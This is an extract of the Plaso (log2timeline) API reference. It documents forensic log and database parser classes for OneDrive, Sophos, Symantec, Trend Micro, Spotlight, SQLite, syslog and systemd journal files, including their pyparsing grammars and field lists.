log_level log level. Type str module name of the module that generated the log message. Type str source_code source file and line number that generated the log message. Type str DATA_TYPE = 'skydrive:log:line' class plaso.parsers.skydrivelog.SkyDriveLogParser Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser Parses SkyDrive log files. DATA_FORMAT = 'OneDrive (or SkyDrive) log file' IGNORE_FIELD = Suppress:(!W:(,)) LINE_STRUCTURES = [('logline', {{{{{{{{{{{{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} !W:(,)} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} Suppress:(!W:(,))} Suppress:(",")} !W:(,)} Suppress:(",")} SkipTo:({{StringEnd | {Suppress:("######") "Logging started."}} | {{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:(",")} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} Suppress:(".")} W:(0123...)}})} [lineEnd]...}), ('header', {{{{{{{{Suppress:("######") "Logging started."} "Version="} W:(0123...)} Suppress:("StartSystemTime:")} Group:({{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} W:(0123...)} Suppress:(".")} W:(0123...)})} "StartLocalTime:"} SkipTo:(lineEnd)} lineEnd})] MSEC = W:(0123...) NAME = 'skydrive_log' ParseRecord(parser_mediator, key, structure) Parse each record structure and return an EventObject if applicable. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, lines) Verify that this file is a SkyDrive log file.

5.1. Subpackages 429 Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • lines (str) – one or more lines from the text file. Returns True if this is the correct parser, False otherwise. Return type bool class plaso.parsers.skydrivelog.SkyDriveOldLogEventData Bases: plaso.containers.events.EventData SkyDrive old log event data. log_level log level. Type str source_code source file and line number that generated the log message. Type str text log message. Type str DATA_TYPE = 'skydrive:log:old:line' class plaso.parsers.skydrivelog.SkyDriveOldLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parse SkyDrive old log files. DATA_FORMAT = 'OneDrive (or SkyDrive) old log file' LINE_STRUCTURES = [('logline', {{{{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}}) Combine:({{{{!W:(:) ":"} W:(0123...)} "!"} W:(0123...)})} {{Suppress:("(") SkipTo:(")")} Suppress:(")")}} ":"} SkipTo:(lineEnd)}), ('no_header_single_line', {{~{Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}})} [Suppress:("->")]} SkipTo:(lineEnd)})] NAME = 'skydrive_log_old' ParseRecord(parser_mediator, key, structure) Parse each record structure and return an EventObject if applicable. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown.

430 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

VerifyStructure(parser_mediator, line) Verify that this file is a SkyDrive old log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.sophos_av module

Sophos Anti-Virus log (SAV.txt) parser. References https://community.sophos.com/kb/en-us/110923 class plaso.parsers.sophos_av.SophosAVLogEventData Bases: plaso.containers.events.EventData Sophos Anti-Virus log event data. text Sophos Anti-Virus log message. Type str DATA_TYPE = 'sophos:av:log' class plaso.parsers.sophos_av.SophosAVLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses Anti-Virus logs (SAV.txt) files. DATA_FORMAT = 'Sophos Anti-Virus log file (SAV.txt) file' LINE_STRUCTURES = [('logline', {Group:({{{W:(0123...) W:(0123...)} W:(0123...)} {{W:(0123...) W:(0123...)} W:(0123...)}}) SkipTo:(lineEnd)})] MAX_LINE_LENGTH = 4096 NAME = 'sophos_av' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verify that this file is a Sophos Anti-Virus log file. Parameters

5.1. Subpackages 431 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfVFS. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.spotlight_storedb module

Parser for Apple Spotlight store database files. class plaso.parsers.spotlight_storedb.SpotlightStoreDatabaseParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for Apple Spotlight store database (store.db) files. DATA_FORMAT = 'Apple Spotlight store database (store.db) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'spotlight_storedb' ParseFileObject(parser_mediator, file_object) Parses an Apple Spotlight store database file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed. class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataAttribute Bases: object Metadata attribute. key key or name of the metadata attribute. Type str property_type metadata attribute property type. Type int value metadata attribute value. Type object value_type metadata attribute value type. Type int

432 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItem Bases: object Metadata item. attributes metadata attributes. Type dict[str, SpotlightStoreMetadataAttribute] data_size size of the record data. Type int flags record flags. Type int identifier file (system) entry identifier. Type int item_identifier item identifier. Type int last_update_time last update time. Type int parent_identifier parent file (system) entry identifier. Type int class plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItemEventData Bases: plaso.containers.events.EventData Apple Spotlight store database metadata item event data. content_type content type of the corresponding file (system) entry (kMDItemContentType). Type str file_name name of the corresponding file (system) entry (_kMDItemFileName). Type str file_system_identifier file system identifier, for example the catalog node identifier (CNID) onHFS. Type int kind item kind (kMDItemKind). Type str parent_file_system_identifier file system identifier of the parent.

5.1. Subpackages 433 Plaso (log2timeline), Release 20210606

Type int DATA_TYPE = 'spotlight:metadata_item' plaso.parsers.sqlite module

SQLite parser. class plaso.parsers.sqlite.SQLiteCache Bases: plaso.parsers.plugins.BasePluginCache Cache for storing results of SQL queries. CacheQueryResults(sql_results, attribute_name, key_name, column_names) Build a dictionary object based on a SQL command. This function will take a SQL command, execute it and for each resulting row it will store a key in a dictionary. An example: sql_results= A SQL result object after executing the SQL command: 'SELECT foo, bla, bar FROM my_table' attribute_name= 'all_the_things' key_name= 'foo' column_names=[ 'bla', 'bar']

Results from running this against the database: ‘first’, ‘stuff’, ‘things’ ‘second’, ‘another stuff’, ‘another thing’ This will result in a dictionary object being created in the cache, called ‘all_the_things’ and it will contain the following value: all_the_things={ 'first':['stuff', 'things'], 'second':['another_stuff', 'another_thing'], 'third':['single_thing']}

Parameters • sql_results (sqlite3.Cursor) – result after executing a SQL command on a database. • attribute_name (str) – attribute name in the cache to store results to. This will be the name of the dictionary attribute. • key_name (str) – name of the result field that should be used as a key in the resulting dictionary that is created. • column_names (list[str]) – of column names that are stored as values to the dictionary. If this list has only one value in it the value will be stored directly, otherwise the value will be a list containing the extracted results based on the names provided in this list.

GetRowCache(query) Retrieves the row cache for a specific query. The row cache is a set that contains hashes of values in a row. The row cache is used to find duplicate row when a database and a database with a WAL file is parsed. Parameters query (str) – query.

434 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Returns hashes of the rows that have been parsed. Return type set class plaso.parsers.sqlite.SQLiteDatabase(filename, temporary_directory=None) Bases: object SQLite database. schema schema as an SQL query per table name, for example {‘Users’: ‘CREATE TABLE Users (“id” INTEGER PRIMARY KEY, ...)’}. Type dict[str, str] Close() Closes the database connection and cleans up the temporary file. Open(file_object, wal_file_object=None) Opens a SQLite database file. Since pysqlite cannot read directly from a file-like object a temporary copy of the file is made. After creating a copy the database file this function sets up a connection with the database and determines the namesof the tables. Parameters • file_object (dfvfs.FileIO) – file-like object. • wal_file_object (Optional[dfvfs.FileIO]) – file-like object for the Write-Ahead Log (WAL) file. Raises • IOError – if the file-like object cannot be read. • OSError – if the file-like object cannot be read. • sqlite3.DatabaseError – if the database cannot be parsed. • ValueError – if the file-like object is missing. Query(query) Queries the database. Parameters query (str) – SQL query. Returns results. Return type sqlite3.Cursor Raises sqlite3.DatabaseError – if querying the database fails. SCHEMA_QUERY = 'SELECT tbl_name, sql FROM sqlite_master WHERE type = "table" AND tbl_name != "xp_proc" AND tbl_name != "sqlite_sequence"' property tables names of all the tables. Type list[str] class plaso.parsers.sqlite.SQLiteParser Bases: plaso.parsers.interface.FileEntryParser Parses SQLite database files. DATA_FORMAT = 'SQLite database file'

5.1. Subpackages 435 Plaso (log2timeline), Release 20210606

classmethod GetFormatSpecification() Retrieves the format specification. Returns a format specification or None if not available. Return type FormatSpecification NAME = 'sqlite' ParseFileEntry(parser_mediator, file_entry) Parses a SQLite database file entry. Parameters • parser_mediator (ParserMediator) – parser mediator. • file_entry (dfvfs.FileEntry) – file entry to be parsed. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.symantec module

This file contains a Symantec parser in plaso. class plaso.parsers.symantec.SymantecEventData Bases: plaso.containers.events.EventData Symantec event data. access access. Type str action0 action0. Type str action1 action1. Type str action1_status action1 status. Type str action2 action2. Type str action2_status action2 status. Type str address address. Type str backup_id backup identifier.

436 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type str cat category. Type str cleaninfo clean information. Type str clientgroup client group. Type str compressed compressed. Type str computer computer. Type str definfo definfo. Type str defseqnumber def sequence number. Type str deleteinfo delete information. Type str depth depth. Type str description description. Type str domain_guid domain identifier (GUID). Type str domainname domain name. Type str err_code error code. Type str

5.1. Subpackages 437 Plaso (log2timeline), Release 20210606

event_data event data. Type str event event. Type str extra extra. Type str file file. Type str flags flags. Type str groupid group identifier. Type str guid guid. Type str license_expiration_dt license expiration date. Type str license_feature_name license feature name. Type str license_feature_ver license feature ver. Type str license_fulfillment_id license fulfillment identifier. Type str license_lifecycle license lifecycle. Type str license_seats_delta license seats delta. Type str license_seats license seats.

438 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type str license_seats_total license seats total. Type str license_serial_num license serial number. Type str license_start_dt license start date. Type str logger logger. Type str login_domain login domain. Type str log_session_guid log session identifier (GUID). Type str macaddr MAC address. Type str new_ext new ext. Type str ntdomain ntdomain. Type str offset offset. Type str parent parent. Type str quarfwd_status quarfwd status. Type str remote_machine_ip remote machine IP address. Type str

5.1. Subpackages 439 Plaso (log2timeline), Release 20210606

remote_machine remote machine. Type str scanid scan identifier. Type str snd_status snd status. Type str status status. Type str still_infected still infected. Type str time time. Type str user user. Type str vbin_id vbin identifier. Type str vbin_session_id vbin session identifier. Type str version version. Type str virus_id virus identifier. Type str virus virus. Type str virustype virustype. Type str DATA_TYPE = 'av:symantec:scanlog'

440 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.parsers.symantec.SymantecParser Bases: plaso.parsers.dsv_parser.DSVParser Parses Symantec AV Corporate Edition and Endpoint Protection log files. COLUMNS = ['time', 'event', 'cat', 'logger', 'computer', 'user', 'virus', 'file', 'action1', 'action2', 'action0', 'virustype', 'flags', 'description', 'scanid', 'new_ext', 'groupid', 'event_data', 'vbin_id', 'virus_id', 'quarfwd_status', 'access', 'snd_status', 'compressed', 'depth', 'still_infected', 'definfo', 'defseqnumber', 'cleaninfo', 'deleteinfo', 'backup_id', 'parent', 'guid', 'clientgroup', 'address', 'domainname', 'ntdomain', 'macaddr', 'version:', 'remote_machine', 'remote_machine_ip', 'action1_status', 'action2_status', 'license_feature_name', 'license_feature_ver', 'license_serial_num', 'license_fulfillment_id', 'license_start_dt', 'license_expiration_dt', 'license_lifecycle', 'license_seats_total', 'license_seats', 'err_code', 'license_seats_delta', 'status', 'domain_guid', 'log_session_guid', 'vbin_session_id', 'login_domain', 'extra'] DATA_FORMAT = 'AV Corporate Edition and Endpoint Protection log file' NAME = 'symantec_scanlog' ParseRow(parser_mediator, row_offset, row) Parses a line of the log file and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row_offset (int) – line number of the row. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. VerifyRow(parser_mediator, row) Verifies if a line of the file is in the expected format. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.syslog module

Parser for syslog formatted log files. Also see: * https://www.rsyslog.com/doc/v8-stable/configuration/templates.html class plaso.parsers.syslog.SyslogCommentEventData Bases: plaso.containers.events.EventData Syslog comment event data. body message body. Type str

5.1. Subpackages 441 Plaso (log2timeline), Release 20210606

DATA_TYPE = 'syslog:comment' class plaso.parsers.syslog.SyslogLineEventData(data_type='syslog:line') Bases: plaso.containers.events.EventData Syslog line event data. body message body. Type str hostname hostname of the reporter. Type str pid process identifier of the reporter. Type str reporter reporter. Type str severity severity. Type str DATA_TYPE = 'syslog:line' class plaso.parsers.syslog.SyslogParser Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser Parses syslog formatted log files DATA_FORMAT = 'System log (syslog) file' EnablePlugins(plugin_includes) Enables parser plugins. Parameters plugin_includes (list[str]) – names of the plugins to enable, where None or an empty list represents all plugins. Note that the default plugin is handled separately.

442 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

LINE_STRUCTURES = [('chromeos_syslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) EMERG | ALERT | CRIT | ERR | WARNING | NOTICE | INFO | DEBUG} W:(0123...)} [Suppress:(":")]} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\ d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\ d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('kernel_syslog_line', {{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} "kernel"} Suppress:(":")} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\ d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\ d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('rsyslog_line', {{{{{{{Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]}) W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\ d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\ d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('rsyslog_traditional_line', {{{{{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} W:(0123...)} W:(0123...)} [{{Suppress:("[") W:(0123...)} Suppress:("]")}]} [{{Suppress:("<") W:(0123...)} Suppress:(">")}]} [Suppress:(":")]} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\ d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\ d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('rsyslog_protocol_23_line', {{{{{{{{{{{Suppress:("<") W:(0123...)} Suppress:(">")} Suppress:(W:(0123...))} Combine:({{{{{{{{{{{{{{{W:(0123...) "-"} W:(0123...)} "-"} W:(0123...)} "T"} W:(0123...)} ":"} W:(0123...)} ":"} W:(0123...)} "."} W:(0123...)} - | +} W:(0123...)} [{":" W:(0123...)}]})} W:(0123...)} W:(0123...)} {Suppress:("-") ^ W:(0123...)}} W:(0123...)} W:(0123...)} Re:('.*?(?=($|\\n\\w{3}\\s+\\d{1,2}\\s\\d{2}:\\d{2}:\\d{2})|($|\\n\\d{4}-\\d{2}-\\ d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s)|($|\\n<\\d{1,3}>1\\s\\ d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{6}[\\+|-]\\d{2}:\\d{2}\\s))')} lineEnd}), ('syslog_comment', {{{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} Suppress:(":")} Suppress:("---")} SkipTo:(" ---")} Suppress:("---")} LineEnd})] NAME = 'syslog' ParseRecord(parser_mediator, key, structure) Parses a matching entry. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – elements parsed from the file.

5.1. Subpackages 443 Plaso (log2timeline), Release 20210606

Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, lines) Verifies that this is a syslog-formatted file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • lines (str) – one or more lines from the text file. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.systemd_journal module

Parser for Systemd journal files. class plaso.parsers.systemd_journal.SystemdJournalEventData Bases: plaso.containers.events.EventData Systemd journal event data. body message body. Type str hostname hostname. Type str pid process identifier (PID). Type int reporter reporter. Type str DATA_TYPE = 'systemd:journal' class plaso.parsers.systemd_journal.SystemdJournalParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parses Systemd Journal files. DATA_FORMAT = 'Systemd journal file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'systemd_journal' ParseFileObject(parser_mediator, file_object) Parses a Systemd journal file-like object.

444 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – parser mediator. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the header cannot be parsed. plaso.parsers.text_parser module

This file contains a class to provide a parsing framework toplaso. This class contains a base framework class for parsing file-like objects, and also some implementations that extend it to provide a more comprehensive parser. plaso.parsers.text_parser.ConvertTokenToInteger(string, location, tokens) Pyparsing parse action callback to convert a token into an integer value. Parameters • string (str) – original string. • location (int) – location in the string where the token was found. • tokens (list[str]) – tokens. Returns integer value or None. Return type int class plaso.parsers.text_parser.EncodedTextReader(encoding, buffer_size=2048) Bases: object Encoded text reader. ReadLine(file_object) Reads a line. Parameters file_object (dfvfs.FileIO) – file-like object. Returns line read from the lines buffer. Return type str ReadLines(file_object) Reads lines into the lines buffer. Parameters file_object (dfvfs.FileIO) – file-like object. Reset() Resets the encoded text reader. SkipAhead(file_object, number_of_characters) Skips ahead a number of characters. Parameters • file_object (dfvfs.FileIO) – file-like object. • number_of_characters (int) – number of characters. plaso.parsers.text_parser.PyParseIntCast(string, location, tokens) Return an integer from a string. This is a pyparsing callback method that converts the matched string into an integer. The method modifies the content of the tokens list and converts them all to an integer value.

5.1. Subpackages 445 Plaso (log2timeline), Release 20210606

Parameters • string (str) – original string. • location (int) – location in the string where the match was made. • tokens (list[str]) – extracted tokens, where the string to be converted is stored. class plaso.parsers.text_parser.PyparsingConstants Bases: object Constants for pyparsing-based parsers. COMMENT_LINE_HASH = {"#" SkipTo:(LineEnd)} DATE = Group:({{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)}) DATE_ELEMENTS = {{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} DATE_TIME = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) DATE_TIME_MSEC = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}}) FOUR_DIGITS = W:(0123...) HYPHEN = Suppress:("-") INTEGER = W:(0123...) IPV4_ADDRESS = IPv4 address IPV6_ADDRESS = IPv6 address IP_ADDRESS = {IPv4 address | IPv6 address} MONTH = W:(ABCD..., abcd...) ONE_OR_TWO_DIGITS = W:(0123...) ONE_TO_THREE_DIGITS = W:(0123...) PID = W:(0123...) THREE_DIGITS = W:(0123...) THREE_LETTERS = W:(ABCD...) TIME = Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}) TIME_ELEMENTS = {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} TIME_MSEC = {{Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}) Suppress:(".")} W:(0123...)} TIME_MSEC_ELEMENTS = {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)} TWO_DIGITS = W:(0123...)

446 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 class plaso.parsers.text_parser.PyparsingMultiLineTextParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Multi line text parser interface based on pyparsing. BUFFER_SIZE = 2048 ParseFileObject(parser_mediator, file_object) Parses a text file-like object using a pyparsing definition. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. abstract ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. This function takes as an input a parsed pyparsing structure and produces an EventObject if possible from that structure. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – tokens from a parsed log line. Returns event or None. Return type EventObject abstract VerifyStructure(parser_mediator, lines) Verify the structure of the file and return boolean based on that check. This function should read enough text from the text file to confirm that the file is the correct one forthis particular parser. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • lines (str) – one or more lines from the text file. Returns True if this is the correct parser, False otherwise. Return type bool class plaso.parsers.text_parser.PyparsingSingleLineTextParser Bases: plaso.parsers.interface.FileObjectParser Single line text parser interface based on pyparsing. LINE_STRUCTURES = [] MAXIMUM_CONSECUTIVE_LINE_FAILURES = 20 MAX_LINE_LENGTH = 400 ParseFileObject(parser_mediator, file_object) Parses a text file-like object using a pyparsing definition.

5.1. Subpackages 447 Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. abstract ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. This function takes as an input a parsed pyparsing structure and produces an EventObject if possible from that structure. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – tokens from a parsed log line. abstract VerifyStructure(parser_mediator, line) Verify the structure of the file and return boolean based on that check. This function should read enough text from the text file to confirm that the file is the correct one forthis particular parser. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – single line from the text file. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.trendmicroav module

Parser for Trend Micro Antivirus logs. Trend Micro uses two log files to track the scans (both manual/scheduled and real-time) and the web reputation (network scan/filtering). Currently only the first log is supported. class plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser Parses the Trend Micro Office Scan Virus Detection Log. COLUMNS = ['date', 'time', 'threat', 'action', 'scan_type', 'unused1', 'path', 'filename', 'unused2', 'timestamp', 'unused3', 'unused4'] DATA_FORMAT = 'Trend Micro Office Scan Virus Detection log file' MIN_COLUMNS = 8 NAME = 'trendmicro_vd' ParseRow(parser_mediator, row_offset, row) Parses a line of the log file and produces events.

448 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row_offset (int) – offset of the line from which the row was extracted. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. VerifyRow(parser_mediator, row) Verifies if a line of the file is in the expected format. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. Returns True if this is the correct parser, False otherwise. Return type bool class plaso.parsers.trendmicroav.OfficeScanWebReputationParser Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser Parses the Trend Micro Office Scan Web Reputation detection log. COLUMNS = ('date', 'time', 'block_mode', 'url', 'group_code', 'group_name', 'credibility_rating', 'policy_identifier', 'application_name', 'credibility_score', 'ip', 'threshold', 'timestamp', 'unused') DATA_FORMAT = 'Trend Micro Office Web Reputation log file' MIN_COLUMNS = 12 NAME = 'trendmicro_url' ParseRow(parser_mediator, row_offset, row) Parses a line of the log file and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row_offset (int) – offset of the line from which the row was extracted. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. VerifyRow(parser_mediator, row) Verifies if a line of the file is in the expected format. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. Returns True if this is the correct parser, False otherwise. Return type bool class plaso.parsers.trendmicroav.TrendMicroAVEventData Bases: plaso.containers.events.EventData Trend Micro AV Log event data.

5.1. Subpackages 449 Plaso (log2timeline), Release 20210606

action action. Type str filename filename. Type str offset offset of the line relative to the start of the file, from which the event data wasextracted. Type int path path. Type str scan_type scan_type. Type str threat threat. Type str DATA_TYPE = 'av:trendmicro:scan' class plaso.parsers.trendmicroav.TrendMicroBaseParser Bases: plaso.parsers.dsv_parser.DSVParser Common code for parsing Trend Micro log files. The file format is reminiscent of CSV, but is not quite the same; the delimiter is a three-character sequenceand there is no provision for quoting or escaping. COLUMNS = () DELIMITER = '<;>' MIN_COLUMNS = None class plaso.parsers.trendmicroav.TrendMicroUrlEventData Bases: plaso.containers.events.EventData Trend Micro Web Reputation Log event data. application_name application name. Type str block_mode operation mode. Type str credibility_rating credibility rating. Type int

450 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

credibility_score credibility score. Type int group_code group code. Type str group_name group name. Type str ip IP address. Type str offset offset of the line relative to the start of the file, from which the event data wasextracted. Type int policy_identifier policy identifier. Type int threshold threshold value. Type int url accessed URL. Type str DATA_TYPE = 'av:trendmicro:webrep' plaso.parsers.utmp module

